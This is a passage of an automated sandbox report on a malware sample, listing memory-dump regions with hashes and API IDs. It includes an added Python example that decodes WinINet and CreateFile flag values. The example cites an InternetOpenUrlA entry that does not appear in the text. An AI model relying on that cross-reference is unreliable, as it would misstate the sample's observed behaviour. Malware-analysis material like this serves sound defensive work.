            • Opcode Fuzzy Hash: be7856d653c3eb0d57167cd4b2d024e751c21780d796ffbeb3aa70841a35e2cb
            • Instruction Fuzzy Hash: 2CE08C64B00B0AAE9B122B788DE4B8D22D2EF166387944315ACB2968D0C725D0458EC2
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,013032F1,0130338A), ref: 0130335A
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 11a46e0882ebfdb43738fef7e5abb6b7791563b8120716ad719fd2b378c61888
            • Instruction ID: 16b61b9a9a33723ce3969f8d41eee69e267bd17fdd727191970be5746c867d25
            • Opcode Fuzzy Hash: 11a46e0882ebfdb43738fef7e5abb6b7791563b8120716ad719fd2b378c61888
            • Instruction Fuzzy Hash: 88C04CB07A0305BAFA349A50DD67F8765169B50F40E6040187B497C0C485F17550C51C
            Uniqueness

            Uniqueness Score: -1.00%
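
The two WinINet and file-API entries above (InternetOpenUrlA with dwFlags 84000100 at ref 013037EA, and CreateFileA with dwDesiredAccess 80000000, dwShareMode 00000001, dwCreationDisposition 00000003 at ref 0130335A) give only raw hex arguments. The following added example, which is not part of the sandbox report, parses those lines as printed and decodes the values into the Windows SDK constant names from wininet.h, winnt.h and fileapi.h. The "uncached download" heuristic is this example's own interpretation, not a finding of the report.

```python
# Added example (not code from the report): parse the API-call lines the report
# lists and decode their raw argument values into Windows SDK constant names.
# Constant values are from wininet.h / winnt.h / fileapi.h; the "uncached
# download" heuristic is this example's own interpretation.
import re
from typing import Dict, List, Optional, Tuple

# wininet.h: dwFlags bits for InternetOpenUrl
INTERNET_FLAGS: Dict[int, str] = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# winnt.h / fileapi.h: CreateFile arguments
GENERIC_ACCESS: Dict[int, str] = {
    0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
}
FILE_SHARE: Dict[int, str] = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION_DISPOSITION: Dict[int, str] = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}

# Lines copied verbatim from the report entries above.
INTERNET_OPEN_URL_LINE = "• InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA"
CREATE_FILE_LINE = "• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,013032F1,0130338A), ref: 0130335A"

_API_LINE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")


def parse_api_line(line: str) -> Tuple[str, str, List[Optional[int]], int]:
    """Return (api, module, args, ref). A '?' (value not recovered) becomes None."""
    m = _API_LINE.match(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    api, module, raw, ref = m.groups()
    args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")] if raw.strip() else []
    return api, module, args, int(ref, 16)


def decode_bitmask(value: int, table: Dict[int, str]) -> Tuple[List[str], int]:
    """Split a flag word into known names (highest bit first) and the leftover unknown bits."""
    names, unknown = [], value
    for bit in sorted(table, reverse=True):
        if value & bit:
            names.append(table[bit])
            unknown &= ~bit
    return names, unknown


def is_uncached_download(flags: int) -> bool:
    """Heuristic (this example's own): RELOAD | NO_CACHE_WRITE | PRAGMA_NOCACHE together
    force a fresh fetch that leaves no WinINet cache entry on disk."""
    needed = 0x80000000 | 0x04000000 | 0x00000100
    return (flags & needed) == needed


def describe(line: str) -> Dict[str, object]:
    """Decode one report line; arguments past the API's prototype are stack residue and ignored."""
    api, module, args, ref = parse_api_line(line)
    out: Dict[str, object] = {"api": api, "module": module, "ref": ref}
    if api.startswith("InternetOpenUrl"):
        # InternetOpenUrl has 6 parameters; dwFlags is the 5th (index 4).
        flags = args[4] or 0
        names, unknown = decode_bitmask(flags, INTERNET_FLAGS)
        out["dwFlags"] = names
        out["unknown_bits"] = unknown
        out["uncached_download"] = is_uncached_download(flags)
    elif api.startswith("CreateFile"):
        # CreateFile has 7 parameters: access (1), share mode (2), disposition (4).
        out["dwDesiredAccess"] = decode_bitmask(args[1] or 0, GENERIC_ACCESS)[0]
        out["dwShareMode"] = decode_bitmask(args[2] or 0, FILE_SHARE)[0]
        out["dwCreationDisposition"] = CREATION_DISPOSITION.get(args[4] or 0, f"unknown({args[4]})")
    return out


if __name__ == "__main__":
    for sample in (INTERNET_OPEN_URL_LINE, CREATE_FILE_LINE):
        print(describe(sample))
```

Decoding 84000100 yields INTERNET_FLAG_RELOAD, INTERNET_FLAG_NO_CACHE_WRITE and INTERNET_FLAG_PRAGMA_NOCACHE with no unknown bits; the CreateFileA call opens an existing file read-only with read sharing. Any nonzero `unknown_bits` value points at a flag missing from the table rather than at the sample.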

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 74e5dd0f56212b1d9a1b32a3e4f92480c40f49945e5ec5bae716f70e4f8692ea
            • Instruction ID: db557e34bb0dc04239e384624ce63d87103b29feeb01204b7925b1fe0dbec24e
            • Opcode Fuzzy Hash: 74e5dd0f56212b1d9a1b32a3e4f92480c40f49945e5ec5bae716f70e4f8692ea
            • Instruction Fuzzy Hash: 5BC02B7038010D0ED10075E90C4214D310AC7D0310FD2C128D090871ECCF1140B367D3
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602809564.000000001D9CD000.00000040.00000001.sdmp, Offset: 1D9CD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c2e2898b1fb16898078b74987001349a71443c14f3468e71de012ebf3dcae79d
            • Instruction ID: 850d36881834add6b642e854da6b4c560934152306ae623fa07953d29b411e54
            • Opcode Fuzzy Hash: c2e2898b1fb16898078b74987001349a71443c14f3468e71de012ebf3dcae79d
            • Instruction Fuzzy Hash: 05210AB1504284EFDB02DF54D9C0B16BF65FB88728F24C56DE9094B24AC376D456C7A3
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602809564.000000001D9CD000.00000040.00000001.sdmp, Offset: 1D9CD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5522f7ce50dfc2676aa2f217ef6d8d9c45a0609bfeab86f9c24a22d0077bc04f
            • Instruction ID: eab531a06890a471781fd9672a26c6a6b08c6c5152741a78517b50d8d613a10c
            • Opcode Fuzzy Hash: 5522f7ce50dfc2676aa2f217ef6d8d9c45a0609bfeab86f9c24a22d0077bc04f
            • Instruction Fuzzy Hash: 9E21B2B1504280EFDB069F54D9C0B27BB65FB88724F24C56DEA094A24BC336E855C6A3
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602851030.000000001D9DD000.00000040.00000001.sdmp, Offset: 1D9DD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ef5361df81f712fd7f043cafca946d218714e457fd9bd1b0a4e73fedd9917572
            • Instruction ID: 44442335053b162ac0f9d8b97a68fa01e198560ea8d739ad5d407b912964d0f7
            • Opcode Fuzzy Hash: ef5361df81f712fd7f043cafca946d218714e457fd9bd1b0a4e73fedd9917572
            • Instruction Fuzzy Hash: DC21F2B1508740EFDB42DF28D9C4B26BB65FBC8714F24C96DE9494B246C336D846CAA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602851030.000000001D9DD000.00000040.00000001.sdmp, Offset: 1D9DD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9d7bbcd4432c8adb67d1b3e2e6269db3e449ffcfc0440d2161c702ec6ed130db
            • Instruction ID: 69bd07b912153dd593c41c5520b189c2af6187d2032173a388686f279be8976d
            • Opcode Fuzzy Hash: 9d7bbcd4432c8adb67d1b3e2e6269db3e449ffcfc0440d2161c702ec6ed130db
            • Instruction Fuzzy Hash: 42218E755097C09FD703CF24D990B15BF71EB86214F28C5EED8498B697C33A980ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602809564.000000001D9CD000.00000040.00000001.sdmp, Offset: 1D9CD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c81115113f28ff7dfe685ccbe4ea99321c4e3c566bc062db5dd486e971ad5fbf
            • Instruction ID: 4301e1ea6e8d77213e283933e474f51e783641c6ab4ab74a10b059eeba4fca73
            • Opcode Fuzzy Hash: c81115113f28ff7dfe685ccbe4ea99321c4e3c566bc062db5dd486e971ad5fbf
            • Instruction Fuzzy Hash: BD118E76504284DFDB02CF54DAC4B16BF72FB84324F24C6ADD8494B65AC33AD45ACBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602809564.000000001D9CD000.00000040.00000001.sdmp, Offset: 1D9CD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c81115113f28ff7dfe685ccbe4ea99321c4e3c566bc062db5dd486e971ad5fbf
            • Instruction ID: 0a01d58e15370705fc20b171f45b042899f25ff53be1ef300ee1773906a76aaf
            • Opcode Fuzzy Hash: c81115113f28ff7dfe685ccbe4ea99321c4e3c566bc062db5dd486e971ad5fbf
            • Instruction Fuzzy Hash: C111BE76904280DFDB02CF54D9C4B16BF71FB85324F24C6ADD8494B65AC33AE45ACBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.602688195.000000001D970000.00000040.00000001.sdmp, Offset: 1D970000, based on PE: false
            Similarity
            • API ID:
            • String ID: D!zl
            • API String ID: 0-2640937134
            • Opcode ID: fe76863da4de4ecab9fbb49fa6f479aac3eb21cfe22a1b1c9293bd65fc70e4ce
            • Instruction ID: f6daa7a066aca7fe3a3cb37957e69b6e6ac8fb21265f465c9edd8314083e9965
            • Opcode Fuzzy Hash: fe76863da4de4ecab9fbb49fa6f479aac3eb21cfe22a1b1c9293bd65fc70e4ce
            • Instruction Fuzzy Hash: 3F03E870D10A5A8ECB15EF68C8806DDF7B1BF99300F15D69AE549A7261EB30AAC4CF41
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.602688195.000000001D970000.00000040.00000001.sdmp, Offset: 1D970000, based on PE: false
            Similarity
            • API ID:
            • String ID: D!zl
            • API String ID: 0-2640937134
            • Opcode ID: c8a86dc2b9c98c86f0dba32bef69d1ae32e55d189e53e56ea8560652fd904f39
            • Instruction ID: 00cdcd4d0ed874dbde25b98a713cfd839f99f7ccd72a54fc97a6ce8b2f16111f
            • Opcode Fuzzy Hash: c8a86dc2b9c98c86f0dba32bef69d1ae32e55d189e53e56ea8560652fd904f39
            • Instruction Fuzzy Hash: 399209B4E006198FCB54DF68C88069DB7F1BF89310F15C6AAD54DAB251EB30AE85CF46
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: LibraryLoadMemoryProtectVirtual
            • String ID:
            • API String ID: 3389902171-0
            • Opcode ID: e0b735742855716d546147232a02fbe7fa9fb1b48e94af05ebab4eb3b855829a
            • Instruction ID: 47b127705e7a71fa047a92ab356d9123e90188dcc613b64f8aadb800cf1e50ed
            • Opcode Fuzzy Hash: e0b735742855716d546147232a02fbe7fa9fb1b48e94af05ebab4eb3b855829a
            • Instruction Fuzzy Hash: 3991D7B06483469EDF27CE2C89BA79577D59F53268F44839ACDA24B2DBD3308492C712
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602688195.000000001D970000.00000040.00000001.sdmp, Offset: 1D970000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c2654def14b2ad75173d99264ce67597f5fee4857c84f213145072b700e4007c
            • Instruction ID: 09ac9304a9300044e442ca8e81fc6f635bd1d651cb19365e5a795a116ea181bd
            • Opcode Fuzzy Hash: c2654def14b2ad75173d99264ce67597f5fee4857c84f213145072b700e4007c
            • Instruction Fuzzy Hash: 3DA14C36E0065ACFCF06CFA5C8445EDBBB6FF89300B15856AE905BB221EB35A945CF41
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: LibraryLoadMemoryProtectVirtual
            • String ID:
            • API String ID: 3389902171-0
            • Opcode ID: f1412921ad5726604d65aba56cb75f06a95037c942809736d5cd87dd32fab2f8
            • Instruction ID: 4e9d89db640d3aaf5672a298230d45ca3b169e587702d9686986c83bc4bf58ca
            • Opcode Fuzzy Hash: f1412921ad5726604d65aba56cb75f06a95037c942809736d5cd87dd32fab2f8
            • Instruction Fuzzy Hash: BE51B3B0548346CECB26CF2C88B9B957BE19F53264F49C29ACC914B2EBD334C446C712
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 51631d19261a81200bac49b5991f466c1e6795c6babbce8281f1c6b989021836
            • Instruction ID: 7aadaa8f81e53b6b7c25c8078e9d9bf8d01809a57ca779b72c98a17ecae50dbc
            • Opcode Fuzzy Hash: 51631d19261a81200bac49b5991f466c1e6795c6babbce8281f1c6b989021836
            • Instruction Fuzzy Hash: 093149B06003019FF3138F58C9A8B967795FF25368F924269DA459B1E2C774D8C5CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 92cb7a8aee6f9a52d4d505511b3737c4ba842ecc9770fab1c86da7e54a27d20a
            • Instruction ID: e3ac747542b0b0c2386c160476520ed2ed2e123c0763c160034fa1978476dbc1
            • Opcode Fuzzy Hash: 92cb7a8aee6f9a52d4d505511b3737c4ba842ecc9770fab1c86da7e54a27d20a
            • Instruction Fuzzy Hash: 6D01B5702443468FDBB78EAC85E879576D6AF06258F44826CCC9A8B6CAD32584868741
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 74d3efecfe96eb1c8705d0daa9b66d4adb2a4b9f4e9df0187713153106b4b0e1
            • Instruction ID: f75c5771ed5bb7ffe87a7f17c9700d3fdf1879838dae9ae8bd41a53b877070ad
            • Opcode Fuzzy Hash: 74d3efecfe96eb1c8705d0daa9b66d4adb2a4b9f4e9df0187713153106b4b0e1
            • Instruction Fuzzy Hash: 4AF06D34341300CFEB26DB18C9E8F5973E9EF56A55F558955E912CB2A2C324EC81EF12
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 95576edcb92816c3069e9aed3c12f71645bc4f6802b5061b731d2132bcd9c4a7
            • Instruction ID: 87c4a5e3c518aa956d67e924e9c6074f119519729277bb142b96270c74c71d1e
            • Opcode Fuzzy Hash: 95576edcb92816c3069e9aed3c12f71645bc4f6802b5061b731d2132bcd9c4a7
            • Instruction Fuzzy Hash: E5D05EB12046459FEA11CE58C8C2B8433A6EB05628B450699E8218F6E2D325D456CF41
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 85a4dc5c8656c8c5c802f57c728556f1a8640315232e516e0d02ff897f305787
            • Instruction ID: 7ee107eb5e00873de5fa101a7fe1a925292b48d6636f6db7d40c5062a4213100
            • Opcode Fuzzy Hash: 85a4dc5c8656c8c5c802f57c728556f1a8640315232e516e0d02ff897f305787
            • Instruction Fuzzy Hash: 05B09274216744CFC246CA28C190F4073F8FB087A0F011480E8028BE52C328E8008900
            Uniqueness

            Uniqueness Score: -1.00%